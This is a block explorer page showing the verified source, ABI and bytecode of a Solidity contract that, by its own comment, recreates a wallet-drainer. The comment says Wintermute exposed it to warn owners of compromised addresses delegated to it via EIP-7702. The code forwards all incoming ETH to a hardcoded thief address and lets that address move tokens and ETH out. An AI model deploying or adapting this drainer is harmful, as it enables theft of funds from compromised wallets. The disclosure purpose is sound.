ETH Price: $1,949.11 (-0.71%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To

There are no matching entries

1 Internal Transaction found.

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Method Block
From
To
0x60a06040224965212025-05-16 15:28:23289 days ago1747409303  Contract Creation0 ETH
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
FlexibleAdvancedCrimeEnjoyor

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 999999 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2025-06-12
*/

pragma solidity 0.8.17;

interface IERC20 {
    function transfer(address to, uint256 value) external returns (bool);
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

contract FlexibleAdvancedCrimeEnjoyor {

    /* 
        This contract is used by bad guys to automatically sweep all incoming ETH/BNB and all tokens upon the contract call from compromised addresses
        Recreated and exposed by Wintermute
        Check more 7702 data here: https://dune.com/wintermute_research/eip7702

        IF YOU FOUND THIS CONTRACT IN ANY AUTHORIZATION LIST, 
        THE EOA DELEGATED TO IT WAS COMPROMISED!!!
        DO NOT SEND ANY ETH/BNB,
        IT WILL BE IMMEDIATELY SWEPT. 
        IF THIS ADDRESS BELONGS TO YOU, CONTACT FLASHBOTS WHITEHAT HOTLINE FOR HELP: https://whitehat.flashbots.net
    */
    

    bytes32 private immutable thief;

    constructor() payable {
        thief = hex"00000000000000000000000000b700b9da0053009cb84400ed1e8fe251002af3";
        uint256 value = msg.value;
        require(value == 0);
    }

    modifier thiefCheck() {
        require(
            address(uint160(uint256(thief))) == tx.origin,
            "lol"
        );
        _;
    }

    function transferFrom(address token, address from, address to, uint256 amount) thiefCheck public {
        IERC20(token).transferFrom(from, to, amount);
    }

    function transfer(address token, address payable to, uint256 amount) thiefCheck public {
        IERC20(token).transfer(to, amount);
    }

    receive() external payable {
        0x00B700B9da0053009cb84400Ed1e8Fe251002aF3.call{value: msg.value}(new bytes(0));
    }

    fallback() external payable {
        0x00B700B9da0053009cb84400Ed1e8Fe251002aF3.call{value: msg.value}(new bytes(0));
    }

    function execute(address _to, uint256 _value, bytes calldata _data) thiefCheck public payable returns (bytes memory) {
        require(_to != address(0));
        (bool sent, bytes memory result) = _to.call{value: _value}(_data);
        require(sent);
        return result;
    }

    function transferEth(address to, uint256 _noOfEth) thiefCheck public {
        (bool sent, ) = to.call{value: _noOfEth}(new bytes(0));
        require(sent, "ETH transfer failed");
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"execute","outputs":[{"internalType":"bytes","name":"","type":"bytes"}],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"address payable","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"_noOfEth","type":"uint256"}],"name":"transferEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a060405272b700b9da0053009cb84400ed1e8fe251002af360805234801561002757600080fd5b5060805161094361005860003960008181610180015281816102ce01528181610413015261055101526109436000f3fe6080604052600436106100435760003560e01c806315dacbea146100f5578063b61d27f614610115578063beabacc81461013e578063e9bb84c21461015e576100d9565b366100d95772b700b9da0053009cb84400ed1e8fe251002af33460005b6040519080825280601f01601f19166020018201604052801561008a576020820181803683370190505b5060405161009891906106fb565b60006040518083038185875af1925050503d80600081146100d2576040519150601f19603f3d011682016040523d82523d6000602084013e005b606091505b005b72b700b9da0053009cb84400ed1e8fe251002af3346000610060565b34801561010157600080fd5b506100d761011036600461073c565b61017e565b61012861012336600461078d565b6102ca565b6040516101359190610816565b60405180910390f35b34801561014a57600080fd5b506100d7610159366004610867565b610411565b34801561016a57600080fd5b506100d76101793660046108a8565b61054f565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff163214610222576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c000000000000000000000000000000000000000000000000000000000060448201526064015b60405180910390fd5b6040517f23b872dd00000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff84811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303816000875af115801561029f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102c391906108d4565b5050505050565b60607f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff16321461036b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c00000000000000000000000000000000000000000000000000000000006044820152606401610219565b73ffffffffffffffffffffffffffffffffffffffff851661038b57600080fd5b6000808673ffffffffffffffffffffffffffffffffffffffff168686866040516103b69291906108fd565b60006040518083038185875af1925050503d80600081146103f3576040519150601f19603f3d011682016040523d82523d6000602084013e6103f8565b606091505b50915091508161040757600080fd5b9695505050505050565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1632146104b0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c00000000000000000000000000000000000000000000000000000000006044820152606401610219565b6040517fa9059cbb00000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff83811660048301526024820183905284169063a9059cbb906044016020604051808303816000875af1158015610525573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061054991906108d4565b50505050565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1632146105ee576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c00000000000000000000000000000000000000000000000000000000006044820152606401610219565b6040805160008082526020820190925273ffffffffffffffffffffffffffffffffffffffff841690839060405161062591906106fb565b60006040518083038185875af1925050503d8060008114610662576040519150601f19603f3d011682016040523d82523d6000602084013e610667565b606091505b50509050806106d2576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601360248201527f455448207472616e73666572206661696c6564000000000000000000000000006044820152606401610219565b505050565b60005b838110156106f25781810151838201526020016106da565b50506000910152565b6000825161070d8184602087016106d7565b9190910192915050565b73ffffffffffffffffffffffffffffffffffffffff8116811461073957600080fd5b50565b6000806000806080858703121561075257600080fd5b843561075d81610717565b9350602085013561076d81610717565b9250604085013561077d81610717565b9396929550929360600135925050565b600080600080606085870312156107a357600080fd5b84356107ae81610717565b935060208501359250604085013567ffffffffffffffff808211156107d257600080fd5b818701915087601f8301126107e657600080fd5b8135818111156107f557600080fd5b88602082850101111561080757600080fd5b95989497505060200194505050565b60208152600082518060208401526108358160408501602087016106d7565b601f017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0169190910160400192915050565b60008060006060848603121561087c57600080fd5b833561088781610717565b9250602084013561089781610717565b929592945050506040919091013590565b600080604083850312156108bb57600080fd5b82356108c681610717565b946020939093013593505050565b6000602082840312156108e657600080fd5b815180151581146108f657600080fd5b9392505050565b818382376000910190815291905056fea2646970667358221220cee7a3c99b954c7a57ac9fae678b2e41718bbf6c48f95c2a6b1c2d38d395ac5b64736f6c63430008110033

Deployed Bytecode

0x6080604052600436106100435760003560e01c806315dacbea146100f5578063b61d27f614610115578063beabacc81461013e578063e9bb84c21461015e576100d9565b366100d95772b700b9da0053009cb84400ed1e8fe251002af33460005b6040519080825280601f01601f19166020018201604052801561008a576020820181803683370190505b5060405161009891906106fb565b60006040518083038185875af1925050503d80600081146100d2576040519150601f19603f3d011682016040523d82523d6000602084013e005b606091505b005b72b700b9da0053009cb84400ed1e8fe251002af3346000610060565b34801561010157600080fd5b506100d761011036600461073c565b61017e565b61012861012336600461078d565b6102ca565b6040516101359190610816565b60405180910390f35b34801561014a57600080fd5b506100d7610159366004610867565b610411565b34801561016a57600080fd5b506100d76101793660046108a8565b61054f565b7f00000000000000000000000000b700b9da0053009cb84400ed1e8fe251002af373ffffffffffffffffffffffffffffffffffffffff163214610222576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c000000000000000000000000000000000000000000000000000000000060448201526064015b60405180910390fd5b6040517f23b872dd00000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff84811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303816000875af115801561029f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102c391906108d4565b5050505050565b60607f00000000000000000000000000b700b9da0053009cb84400ed1e8fe251002af373ffffffffffffffffffffffffffffffffffffffff16321461036b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c00000000000000000000000000000000000000000000000000000000006044820152606401610219565b73ffffffffffffffffffffffffffffffffffffffff851661038b57600080fd5b6000808673ffffffffffffffffffffffffffffffffffffffff168686866040516103b69291906108fd565b60006040518083038185875af1925050503d80600081146103f3576040519150601f19603f3d011682016040523d82523d6000602084013e6103f8565b606091505b50915091508161040757600080fd5b9695505050505050565b7f00000000000000000000000000b700b9da0053009cb84400ed1e8fe251002af373ffffffffffffffffffffffffffffffffffffffff1632146104b0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c00000000000000000000000000000000000000000000000000000000006044820152606401610219565b6040517fa9059cbb00000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff83811660048301526024820183905284169063a9059cbb906044016020604051808303816000875af1158015610525573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061054991906108d4565b50505050565b7f00000000000000000000000000b700b9da0053009cb84400ed1e8fe251002af373ffffffffffffffffffffffffffffffffffffffff1632146105ee576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152600360248201527f6c6f6c00000000000000000000000000000000000000000000000000000000006044820152606401610219565b6040805160008082526020820190925273ffffffffffffffffffffffffffffffffffffffff841690839060405161062591906106fb565b60006040518083038185875af1925050503d8060008114610662576040519150601f19603f3d011682016040523d82523d6000602084013e610667565b606091505b50509050806106d2576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601360248201527f455448207472616e73666572206661696c6564000000000000000000000000006044820152606401610219565b505050565b60005b838110156106f25781810151838201526020016106da565b50506000910152565b6000825161070d8184602087016106d7565b9190910192915050565b73ffffffffffffffffffffffffffffffffffffffff8116811461073957600080fd5b50565b6000806000806080858703121561075257600080fd5b843561075d81610717565b9350602085013561076d81610717565b9250604085013561077d81610717565b9396929550929360600135925050565b600080600080606085870312156107a357600080fd5b84356107ae81610717565b935060208501359250604085013567ffffffffffffffff808211156107d257600080fd5b818701915087601f8301126107e657600080fd5b8135818111156107f557600080fd5b88602082850101111561080757600080fd5b95989497505060200194505050565b60208152600082518060208401526108358160408501602087016106d7565b601f017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0169190910160400192915050565b60008060006060848603121561087c57600080fd5b833561088781610717565b9250602084013561089781610717565b929592945050506040919091013590565b600080604083850312156108bb57600080fd5b82356108c681610717565b946020939093013593505050565b6000602082840312156108e657600080fd5b815180151581146108f657600080fd5b9392505050565b818382376000910190815291905056fea2646970667358221220cee7a3c99b954c7a57ac9fae678b2e41718bbf6c48f95c2a6b1c2d38d395ac5b64736f6c63430008110033

Deployed Bytecode Sourcemap

220:2119:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1624:42;1679:9;1700:1;1690:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;1690:12:0;;1624:79;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;220:2119;1758:42;1813:9;1834:1;1824:12;;1270:160;;;;;;;;;;-1:-1:-1;1270:160:0;;;;;:::i;:::-;;:::i;1853:286::-;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1438:140;;;;;;;;;;-1:-1:-1;1438:140:0;;;;;:::i;:::-;;:::i;2147:189::-;;;;;;;;;;-1:-1:-1;2147:189:0;;;;;:::i;:::-;;:::i;1270:160::-;1190:5;1166:45;;1202:9;1166:45;1144:98;;;;;;;3760:2:1;1144:98:0;;;3742:21:1;3799:1;3779:18;;;3772:29;3837:5;3817:18;;;3810:33;3860:18;;1144:98:0;;;;;;;;;1378:44:::1;::::0;;;;:26:::1;4170:15:1::0;;;1378:44:0::1;::::0;::::1;4152:34:1::0;4222:15;;;4202:18;;;4195:43;4254:18;;;4247:34;;;1378:26:0;::::1;::::0;::::1;::::0;4064:18:1;;1378:44:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;1270:160:::0;;;;:::o;1853:286::-;1956:12;1190:5;1166:45;;1202:9;1166:45;1144:98;;;;;;;3760:2:1;1144:98:0;;;3742:21:1;3799:1;3779:18;;;3772:29;3837:5;3817:18;;;3810:33;3860:18;;1144:98:0;3558:326:1;1144:98:0;1989:17:::1;::::0;::::1;1981:26;;;::::0;::::1;;2019:9;2030:19:::0;2053:3:::1;:8;;2069:6;2077:5;;2053:30;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2018:65;;;;2102:4;2094:13;;;::::0;::::1;;2125:6:::0;1853:286;-1:-1:-1;;;;;;1853:286:0:o;1438:140::-;1190:5;1166:45;;1202:9;1166:45;1144:98;;;;;;;3760:2:1;1144:98:0;;;3742:21:1;3799:1;3779:18;;;3772:29;3837:5;3817:18;;;3810:33;3860:18;;1144:98:0;3558:326:1;1144:98:0;1536:34:::1;::::0;;;;:22:::1;5050:55:1::0;;;1536:34:0::1;::::0;::::1;5032:74:1::0;5122:18;;;5115:34;;;1536:22:0;::::1;::::0;::::1;::::0;5005:18:1;;1536:34:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;1438:140:::0;;;:::o;2147:189::-;1190:5;1166:45;;1202:9;1166:45;1144:98;;;;;;;3760:2:1;1144:98:0;;;3742:21:1;3799:1;3779:18;;;3772:29;3837:5;3817:18;;;3810:33;3860:18;;1144:98:0;3558:326:1;1144:98:0;2268:12:::1;::::0;;2228:9:::1;2268:12:::0;;;::::1;::::0;::::1;::::0;;;2243:7:::1;::::0;::::1;::::0;2258:8;;2243:38:::1;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2227:54;;;2300:4;2292:36;;;::::0;::::1;::::0;;5362:2:1;2292:36:0::1;::::0;::::1;5344:21:1::0;5401:2;5381:18;;;5374:30;5440:21;5420:18;;;5413:49;5479:18;;2292:36:0::1;5160:343:1::0;2292:36:0::1;2216:120;2147:189:::0;;:::o;203:250:1:-;288:1;298:113;312:6;309:1;306:13;298:113;;;388:11;;;382:18;369:11;;;362:39;334:2;327:10;298:113;;;-1:-1:-1;;445:1:1;427:16;;420:27;203:250::o;458:287::-;587:3;625:6;619:13;641:66;700:6;695:3;688:4;680:6;676:17;641:66;:::i;:::-;723:16;;;;;458:287;-1:-1:-1;;458:287:1:o;750:154::-;836:42;829:5;825:54;818:5;815:65;805:93;;894:1;891;884:12;805:93;750:154;:::o;909:598::-;995:6;1003;1011;1019;1072:3;1060:9;1051:7;1047:23;1043:33;1040:53;;;1089:1;1086;1079:12;1040:53;1128:9;1115:23;1147:31;1172:5;1147:31;:::i;:::-;1197:5;-1:-1:-1;1254:2:1;1239:18;;1226:32;1267:33;1226:32;1267:33;:::i;:::-;1319:7;-1:-1:-1;1378:2:1;1363:18;;1350:32;1391:33;1350:32;1391:33;:::i;:::-;909:598;;;;-1:-1:-1;1443:7:1;;1497:2;1482:18;1469:32;;-1:-1:-1;;909:598:1:o;1512:794::-;1600:6;1608;1616;1624;1677:2;1665:9;1656:7;1652:23;1648:32;1645:52;;;1693:1;1690;1683:12;1645:52;1732:9;1719:23;1751:31;1776:5;1751:31;:::i;:::-;1801:5;-1:-1:-1;1853:2:1;1838:18;;1825:32;;-1:-1:-1;1908:2:1;1893:18;;1880:32;1931:18;1961:14;;;1958:34;;;1988:1;1985;1978:12;1958:34;2026:6;2015:9;2011:22;2001:32;;2071:7;2064:4;2060:2;2056:13;2052:27;2042:55;;2093:1;2090;2083:12;2042:55;2133:2;2120:16;2159:2;2151:6;2148:14;2145:34;;;2175:1;2172;2165:12;2145:34;2220:7;2215:2;2206:6;2202:2;2198:15;2194:24;2191:37;2188:57;;;2241:1;2238;2231:12;2188:57;1512:794;;;;-1:-1:-1;;2272:2:1;2264:11;;-1:-1:-1;;;1512:794:1:o;2311:453::-;2458:2;2447:9;2440:21;2421:4;2490:6;2484:13;2533:6;2528:2;2517:9;2513:18;2506:34;2549:79;2621:6;2616:2;2605:9;2601:18;2596:2;2588:6;2584:15;2549:79;:::i;:::-;2680:2;2668:15;2685:66;2664:88;2649:104;;;;2755:2;2645:113;;2311:453;-1:-1:-1;;2311:453:1:o;2769:464::-;2854:6;2862;2870;2923:2;2911:9;2902:7;2898:23;2894:32;2891:52;;;2939:1;2936;2929:12;2891:52;2978:9;2965:23;2997:31;3022:5;2997:31;:::i;:::-;3047:5;-1:-1:-1;3104:2:1;3089:18;;3076:32;3117:33;3076:32;3117:33;:::i;:::-;2769:464;;3169:7;;-1:-1:-1;;;3223:2:1;3208:18;;;;3195:32;;2769:464::o;3238:315::-;3306:6;3314;3367:2;3355:9;3346:7;3342:23;3338:32;3335:52;;;3383:1;3380;3373:12;3335:52;3422:9;3409:23;3441:31;3466:5;3441:31;:::i;:::-;3491:5;3543:2;3528:18;;;;3515:32;;-1:-1:-1;;;3238:315:1:o;4292:277::-;4359:6;4412:2;4400:9;4391:7;4387:23;4383:32;4380:52;;;4428:1;4425;4418:12;4380:52;4460:9;4454:16;4513:5;4506:13;4499:21;4492:5;4489:32;4479:60;;4535:1;4532;4525:12;4479:60;4558:5;4292:277;-1:-1:-1;;;4292:277:1:o;4574:271::-;4757:6;4749;4744:3;4731:33;4713:3;4783:16;;4808:13;;;4783:16;4574:271;-1:-1:-1;4574:271:1:o

Swarm Source

ipfs://cee7a3c99b954c7a57ac9fae678b2e41718bbf6c48f95c2a6b1c2d38d395ac5b

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.